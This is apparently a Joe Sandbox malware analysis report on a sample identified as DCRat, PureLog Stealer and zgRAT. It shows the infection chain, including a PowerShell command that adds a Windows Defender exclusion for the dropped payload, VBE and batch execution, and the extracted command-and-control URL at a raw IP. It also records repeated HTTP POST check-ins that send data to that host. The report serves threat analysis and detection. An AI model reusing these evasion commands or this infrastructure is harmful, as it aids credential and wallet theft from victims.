Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1569008
MD5:c9059dfb76ad9e011d4e11608ccc98cc
SHA1:c7ec739a977cc99a19e39103e2a20d59a6094508
SHA256:906e30690506eb761b3f84f7ae1146db9dc796e60d87303173fc99370485c58f
Tags:exeuser-Bitsight
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates processes via WMI
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious execution chain found
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7628 cmdline: "C:\Users\user\Desktop\file.exe" MD5: C9059DFB76AD9E011D4E11608CCC98CC)
    • wscript.exe (PID: 7672 cmdline: "C:\Windows\System32\WScript.exe" "C:\MsContainer\P69CZ8d7qXWcyOsB66pHSLt72y6yplqEAs.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 7832 cmdline: C:\Windows\system32\cmd.exe /c ""C:\MsContainer\GHGhSTUsO1Bq4f5yX2eWVB.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chainportruntimeCrtMonitor.exe (PID: 7876 cmdline: "C:\MsContainer/chainportruntimeCrtMonitor.exe" MD5: 38514F88AFF517EA6BE4724D24B28FE2)
          • powershell.exe (PID: 7972 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WmiPrvSE.exe (PID: 7428 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • cmd.exe (PID: 8072 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\hlVW2PE0oG.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 8128 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • PING.EXE (PID: 8144 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
            • kahKUDRlEYHfKIalWlM.exe (PID: 7644 cmdline: "C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe" MD5: 38514F88AFF517EA6BE4724D24B28FE2)
  • kahKUDRlEYHfKIalWlM.exe (PID: 7244 cmdline: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe MD5: 38514F88AFF517EA6BE4724D24B28FE2)
  • kahKUDRlEYHfKIalWlM.exe (PID: 7264 cmdline: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe MD5: 38514F88AFF517EA6BE4724D24B28FE2)
  • svchost.exe (PID: 3220 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://193.3.168.50/privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
file.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    file.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\MsContainer\chainportruntimeCrtMonitor.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            C:\MsContainer\chainportruntimeCrtMonitor.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

              Memory Dumps

              SourceRuleDescriptionAuthorStrings
              00000000.00000003.1644868327.000000000523A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                0000000E.00000002.2910935301.0000000003B02000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                  00000000.00000003.1643679277.00000000068D9000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    0000000E.00000002.2910935301.000000000384A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      00000004.00000000.1762447136.0000000000572000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                        Click to see the 5 entries

                        Unpacked PEs

                        SourceRuleDescriptionAuthorStrings
                        0.3.file.exe.69276f8.0.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                          0.3.file.exe.69276f8.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                            0.3.file.exe.52886f8.1.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                              0.3.file.exe.52886f8.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                                0.3.file.exe.52886f8.1.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                  Click to see the 5 entries

                                  Sigma Signatures

                                  System Summary

                                  barindex
                                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\MsContainer/chainportruntimeCrtMonitor.exe", ParentImage: C:\MsContainer\chainportruntimeCrtMonitor.exe, ParentProcessId: 7876, ParentProcessName: chainportruntimeCrtMonitor.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe', ProcessId: 7972, ProcessName: powershell.exe
                                  Sigma detected: Suspicious Script Execution From Temp Folder
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\MsContainer/chainportruntimeCrtMonitor.exe", ParentImage: C:\MsContainer\chainportruntimeCrtMonitor.exe, ParentProcessId: 7876, ParentProcessName: chainportruntimeCrtMonitor.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe', ProcessId: 7972, ProcessName: powershell.exe
                                  Sigma detected: Powershell Defender Exclusion
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\MsContainer/chainportruntimeCrtMonitor.exe", ParentImage: C:\MsContainer\chainportruntimeCrtMonitor.exe, ParentProcessId: 7876, ParentProcessName: chainportruntimeCrtMonitor.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe', ProcessId: 7972, ProcessName: powershell.exe
                                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\MsContainer\P69CZ8d7qXWcyOsB66pHSLt72y6yplqEAs.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\MsContainer\P69CZ8d7qXWcyOsB66pHSLt72y6yplqEAs.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7628, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\MsContainer\P69CZ8d7qXWcyOsB66pHSLt72y6yplqEAs.vbe" , ProcessId: 7672, ProcessName: wscript.exe
                                  Sigma detected: Non Interactive PowerShell Process Spawned
                                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\MsContainer/chainportruntimeCrtMonitor.exe", ParentImage: C:\MsContainer\chainportruntimeCrtMonitor.exe, ParentProcessId: 7876, ParentProcessName: chainportruntimeCrtMonitor.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe', ProcessId: 7972, ProcessName: powershell.exe
                                  Sigma detected: Windows Processes Suspicious Parent Directory
                                  Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3220, ProcessName: svchost.exe

                                  Suricata Signatures

                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-12-05T10:53:17.949836+010020480951A Network Trojan was detected192.168.2.449734193.3.168.5080TCP

                                  Joe Sandbox Signatures

                                  Click to jump to signature section

                                  Show All Signature Results

                                  AV Detection

                                  barindex
                                  Antivirus / Scanner detection for submitted sample
                                  Source: file.exeAvira: detected
                                  Antivirus detection for URL or domain
                                  Source: http://193.3.168.50/privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.phpAvira URL Cloud: Label: malware
                                  Antivirus detection for dropped file
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                  Source: C:\Users\user\Desktop\GYwcCMoE.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                  Source: C:\MsContainer\P69CZ8d7qXWcyOsB66pHSLt72y6yplqEAs.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                  Source: C:\Users\user\Desktop\aEtIhTbg.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                  Source: C:\Users\user\AppData\Local\Temp\hlVW2PE0oG.batAvira: detection malicious, Label: BAT/Delbat.C
                                  Found malware configuration
                                  Source: 00000004.00000002.1801521334.0000000012BCD000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://193.3.168.50/privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                                  Multi AV Scanner detection for dropped file
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeReversingLabs: Detection: 57%
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeReversingLabs: Detection: 57%
                                  Source: C:\Users\user\Desktop\GYwcCMoE.logReversingLabs: Detection: 50%
                                  Source: C:\Users\user\Desktop\UFpBXUVk.logReversingLabs: Detection: 25%
                                  Source: C:\Users\user\Desktop\YuXIhBvf.logReversingLabs: Detection: 29%
                                  Source: C:\Users\user\Desktop\ZlAIxOci.logReversingLabs: Detection: 25%
                                  Source: C:\Users\user\Desktop\aEtIhTbg.logReversingLabs: Detection: 50%
                                  Source: C:\Users\user\Desktop\jYCYFtEB.logReversingLabs: Detection: 15%
                                  Source: C:\Users\user\Desktop\pQfxiZJp.logReversingLabs: Detection: 29%
                                  Source: C:\Users\user\Desktop\vCAeICGo.logReversingLabs: Detection: 15%
                                  Multi AV Scanner detection for submitted file
                                  Source: file.exeReversingLabs: Detection: 55%
                                  AI detected suspicious sample
                                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                                  Machine Learning detection for dropped file
                                  Source: C:\Users\user\Desktop\YuXIhBvf.logJoe Sandbox ML: detected
                                  Source: C:\Users\user\Desktop\vCAeICGo.logJoe Sandbox ML: detected
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeJoe Sandbox ML: detected
                                  Source: C:\Users\user\Desktop\jYCYFtEB.logJoe Sandbox ML: detected
                                  Source: C:\Users\user\Desktop\WzsROUza.logJoe Sandbox ML: detected
                                  Source: C:\Users\user\Desktop\QRPSxHgy.logJoe Sandbox ML: detected
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeJoe Sandbox ML: detected
                                  Source: C:\Users\user\Desktop\pQfxiZJp.logJoe Sandbox ML: detected
                                  Machine Learning detection for sample
                                  Source: file.exeJoe Sandbox ML: detected
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeCode function: 14_2_00007FFD9BD009FA CryptUnprotectData,14_2_00007FFD9BD009FA
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeCode function: 14_2_00007FFD9BD011CE CryptUnprotectData,14_2_00007FFD9BD011CE
                                  Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: file.exe
                                  Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2943770878.000000001CFAE000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: AppDINetCookntkrnlmp.pdb source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2943770878.000000001CFAE000.00000004.00000020.00020000.00000000.sdmp
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E3A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00E3A69B
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00E4C220
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeFile opened: C:\Users\userJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeFile opened: C:\Users\user\AppDataJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

                                  Software Vulnerabilities

                                  barindex
                                  Suspicious execution chain found
                                  Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh4_2_00007FFD9B93CD6D
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeCode function: 4x nop then jmp 00007FFD9B791C96h14_2_00007FFD9B791A8E
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh14_2_00007FFD9B93CD6D
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeCode function: 4x nop then jmp 00007FFD9BD00679h14_2_00007FFD9BD003E8
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeCode function: 4x nop then jmp 00007FFD9BD00679h14_2_00007FFD9BD00578
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeCode function: 4x nop then jmp 00007FFD9BD00679h14_2_00007FFD9BD00588

                                  Networking

                                  barindex
                                  Suricata IDS alerts for network traffic
                                  Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49734 -> 193.3.168.50:80
                                  Uses ping.exe to check the status of other devices and networks
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                  Source: Joe Sandbox ViewASN Name: ARNES-NETAcademicandResearchNetworkofSloveniaSI ARNES-NETAcademicandResearchNetworkofSloveniaSI
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 384Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1936Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: multipart/form-data; boundary=----vb00ndIHgHvNoJ7fSqVxvDUiUocs3TKQONUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 114202Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1936Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continue
